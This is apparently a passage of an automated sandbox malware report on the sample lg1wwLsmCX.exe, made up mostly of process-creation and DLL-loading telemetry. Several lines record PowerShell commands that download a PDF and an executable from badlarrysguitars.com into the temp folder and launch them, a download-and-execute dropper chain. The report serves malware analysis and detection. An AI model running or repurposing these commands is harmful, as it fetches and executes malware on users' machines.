Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")Jump to behavior
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1768,i,14827826412355596552,2148674683166230216,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: softy.pdb source: powershell.exe, 00000010.00000002.1841523083.000002BB1BD6E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.1842069784.000002BB1BE05000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Management.resourcesn.pdb^ source: powershell.exe, 00000010.00000002.1841523083.000002BB1BD81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb6 source: powershell.exe, 00000010.00000002.1841523083.000002BB1BD81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rlib.pdb source: powershell.exe, 00000010.00000002.1842069784.000002BB1BE05000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")Jump to behavior
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")Jump to behavior
Source: initial sampleStatic PE information: section where entry point is pointing to: T10B924G
Source: lg1wwLsmCX.exeStatic PE information: real checksum: 0x19cbc should be: 0x1e859
Source: lg1wwLsmCX.exeStatic PE information: section name: T10B924G
Source: lg1wwLsmCX.exeStatic PE information: section name: G8MCUXOZ
Source: lg1wwLsmCX.exeStatic PE information: section name: Z2TXZQUP
Source: lg1wwLsmCX.exeStatic PE information: section name: SRW4MTG9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C02345E5 pushad ; ret 5_2_00007FF7C02345FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF7C02463FA pushad ; iretd 16_2_00007FF7C02463FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF7C02463EA push eax; iretd 16_2_00007FF7C02463EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF7C024842E pushad ; ret 16_2_00007FF7C024845D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF7C0247C2E pushad ; retf 16_2_00007FF7C0247C5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF7C024845E push eax; ret 16_2_00007FF7C024846D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF7C0247C5E push eax; retf 16_2_00007FF7C0247C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF7C024A54D push eax; retf 16_2_00007FF7C024A551
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF7C02445E5 pushad ; ret 16_2_00007FF7C02445FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF7C0245FFA pushad ; retf 16_2_00007FF7C0245FFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF7C0245FEA push eax; retf 16_2_00007FF7C0245FEB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
